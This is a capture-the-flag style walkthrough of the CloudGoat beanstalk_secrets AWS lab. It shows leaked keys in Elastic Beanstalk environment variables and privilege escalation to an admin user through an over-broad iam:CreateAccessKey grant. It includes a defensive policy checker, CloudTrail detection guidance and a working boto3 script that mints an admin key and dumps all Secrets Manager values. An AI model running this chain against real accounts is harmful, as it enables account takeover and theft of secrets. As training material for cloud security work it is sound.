This is a walkthrough of Capstone Challenge #1: Beanstalk Secrets from Introduction to AWS Pentesting by Tyler Ramsbey. It is based on the CloudGoat beanstalk_secrets scenario. You are given access to a low-privileged IAM user with some Elastic Beanstalk permissions.
With no prior knowledge of Elastic Beanstalk, I decided to search for beanstalk modules in pacu.
Running elasticbeanstalk__enum revealed working AWS credentials, SECONDARY_ACCESS_KEY and SECONDARY_SECRET_KEY, stored in the application's environment variables. Elastic Beanstalk environment properties are part of the environment's configuration settings, so any principal with describe-level Beanstalk access can read them; they are not a safe place for secrets.
Running the iam__bruteforce_permissions module as the secondary user revealed that this account has wider IAM permissions, which allow it to list users, roles and policies.
The managed policy arn:aws:iam::.:policy/cgid7y4jbx8ir8_secondary_policy, which is attached to this user, has an interesting grant:
└─$ aws iam get-policy-version --policy-arn "arn:aws:iam::.:policy/cgid7y4jbx8ir8_secondary_policy" --version-id v1
[...]
        {
            "Action": [
                "iam:CreateAccessKey"
            ],
            "Effect": "Allow",
            "Resource": "*"
        },
Because the statement's Resource is "*", the secondary user can call iam:CreateAccessKey against any IAM user in the account, including the admin user. A freshly created access key is a full, long-lived credential for that user, so this single permission is equivalent to assuming any user's identity; pacu's iam__privesc_scan module checks for exactly this method (CreateAccessKey). One practical limit: an IAM user can hold at most two access keys, so the call fails with a LimitExceeded error if the target already has two. Here it succeeds against the admin user:
└─$ aws iam create-access-key --user-name "cgid7y4jbx8ir8_admin_user"
{
    "AccessKey": {
        "UserName": "cgid7y4jbx8ir8_admin_user",
        "AccessKeyId": "AKIA4CUD5DQHTAFOAGMG",
        "Status": "Active",
        "SecretAccessKey": "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",
        "CreateDate": "2025-05-19T16:25:37+00:00"
    }
}
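The grant above is easy to miss in a long policy, so the following is an added example (not code from the walkthrough or from CloudGoat) of the check a reviewer would run over a user's attached policies: evaluate whether iam:CreateAccessKey is allowed on each user ARN in the account, honouring explicit Deny, NotAction/NotResource and IAM wildcard matching. The policy documents, the account id and the secondary user's name are constructed placeholders that mirror the grant shown above; the admin user name is the one from the page. Statements carrying a Condition are skipped, which is a deliberate simplification.

```python
"""Added example: find which IAM users a principal can take over via iam:CreateAccessKey.
Not part of the original walkthrough; policies, account id and the secondary user's
name below are constructed placeholders mirroring the grant shown on the page."""
from __future__ import annotations

import re

ACCOUNT = "123456789012"  # placeholder; the real account id is elided on the page
ADMIN_USER_ARN = f"arn:aws:iam::{ACCOUNT}:user/cgid7y4jbx8ir8_admin_user"
SELF_USER_ARN = f"arn:aws:iam::{ACCOUNT}:user/cgid7y4jbx8ir8_secondary_user"  # assumed name

# Constructed to mirror cgid7y4jbx8ir8_secondary_policy as shown above.
OVERLY_BROAD_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:ListUsers", "iam:ListRoles", "iam:ListPolicies"], "Resource": "*"},
        {"Effect": "Allow", "Action": ["iam:CreateAccessKey"], "Resource": "*"},
    ],
}

# The same intent, scoped so the user can only rotate its own key.
SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": {"Effect": "Allow", "Action": "iam:CreateAccessKey", "Resource": SELF_USER_ARN},
}


def _listify(value):
    """IAM allows a string, a list, or (for Statement) a single object."""
    if value is None:
        return []
    return [value] if isinstance(value, (str, dict)) else list(value)


def _wild(pattern: str, value: str, *, ignore_case: bool) -> bool:
    """IAM wildcard match: '*' is any run of characters, '?' is one character.
    Action names are case-insensitive, resource ARNs are case-sensitive."""
    regex = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(regex, value, re.IGNORECASE if ignore_case else 0) is not None


def _covers_action(stmt: dict, action: str) -> bool:
    if "Action" in stmt:
        return any(_wild(p, action, ignore_case=True) for p in _listify(stmt["Action"]))
    return not any(_wild(p, action, ignore_case=True) for p in _listify(stmt.get("NotAction")))


def _covers_resource(stmt: dict, resource: str) -> bool:
    if "Resource" in stmt:
        return any(_wild(p, resource, ignore_case=False) for p in _listify(stmt["Resource"]))
    return not any(_wild(p, resource, ignore_case=False) for p in _listify(stmt.get("NotResource")))


def is_allowed(policies: list[dict], action: str, resource: str) -> bool:
    """Identity-policy evaluation: an explicit Deny wins over any Allow, and with no
    matching statement the result is an implicit deny. Statements with a Condition
    are skipped here, so a conditioned Allow is reported as not granting access."""
    allowed = False
    for policy in policies:
        for stmt in _listify(policy["Statement"]):
            if "Condition" in stmt:
                continue
            if not (_covers_action(stmt, action) and _covers_resource(stmt, resource)):
                continue
            if stmt["Effect"] == "Deny":
                return False
            allowed = True
    return allowed


def takeover_candidates(policies: list[dict], user_arns: list[str]) -> list[str]:
    """Users whose identity the policy holder can assume by minting them a new access key."""
    return [arn for arn in user_arns if is_allowed(policies, "iam:CreateAccessKey", arn)]


def main() -> None:
    users = [ADMIN_USER_ARN, SELF_USER_ARN]
    for label, policy in (("overly broad", OVERLY_BROAD_POLICY), ("scoped", SCOPED_POLICY)):
        print(f"{label}: can mint keys for {takeover_candidates([policy], users)}")


if __name__ == "__main__":
    main()
```

In a real review you would feed is_allowed the documents returned by aws iam get-policy-version for every policy attached to the user (and to its groups), and treat any user ARN other than the principal's own appearing in takeover_candidates as a finding.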
Using the admin user's new key, it is possible to enumerate Secrets Manager and retrieve the final flag. On the detection side, CloudTrail records the CreateAccessKey call with the secondary user as the caller and the admin user in requestParameters.userName, and the first use of the new key then appears under the admin user's identity; a key created by one user for another, followed shortly by activity from the target, is the pattern to alert on.
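The pivot from the minted key to the flag, written out as an added example with boto3 (this is not code from the walkthrough, CloudGoat or pacu): create a key for the admin user, open a session with it, confirm the identity with STS, then list every secret and read its current value. The boto3 clients are passed in as parameters so the logic can be exercised without AWS; main() assumes boto3 is installed, that the secondary user's credentials live in a local profile named "secondary", and that the lab runs in us-east-1.

```python
"""Added example: take over the admin user via iam:CreateAccessKey and read Secrets Manager.
Not part of the original walkthrough. Assumptions: boto3 is installed, the secondary
user's keys are in the AWS CLI profile "secondary", and the region is us-east-1."""
from __future__ import annotations

ADMIN_USER = "cgid7y4jbx8ir8_admin_user"  # from the walkthrough
REGION = "us-east-1"                      # assumed lab region


def mint_key(iam, user_name: str) -> dict[str, str]:
    """Create a new access key for another user; the result is that user's credential.
    IAM allows at most two keys per user, so this raises LimitExceededException if
    both slots are already taken."""
    key = iam.create_access_key(UserName=user_name)["AccessKey"]
    return {"aws_access_key_id": key["AccessKeyId"],
            "aws_secret_access_key": key["SecretAccessKey"]}


def caller_arn(sts) -> str:
    """Confirm the new credentials really resolve to the target user before going on."""
    return sts.get_caller_identity()["Arn"]


def dump_secrets(sm) -> dict[str, str]:
    """Enumerate every secret (list_secrets is paginated) and fetch its current value.
    Secrets Manager returns either SecretString or SecretBinary."""
    found: dict[str, str] = {}
    for page in sm.get_paginator("list_secrets").paginate():
        for entry in page["SecretList"]:
            value = sm.get_secret_value(SecretId=entry["ARN"])
            if "SecretString" in value:
                found[entry["Name"]] = value["SecretString"]
            else:
                found[entry["Name"]] = value["SecretBinary"].decode("utf-8", "replace")
    return found


def main() -> None:
    import boto3  # imported here so the functions above work without boto3 installed

    secondary = boto3.Session(profile_name="secondary", region_name=REGION)  # assumed profile
    creds = mint_key(secondary.client("iam"), ADMIN_USER)
    admin = boto3.Session(region_name=REGION, **creds)
    print("now acting as", caller_arn(admin.client("sts")))
    for name, value in dump_secrets(admin.client("secretsmanager")).items():
        print(f"{name}: {value}")


if __name__ == "__main__":
    main()
```

When you are done with the lab, delete the key you created (aws iam delete-access-key --user-name cgid7y4jbx8ir8_admin_user --access-key-id ...) so the admin user is not left with a stray long-lived credential.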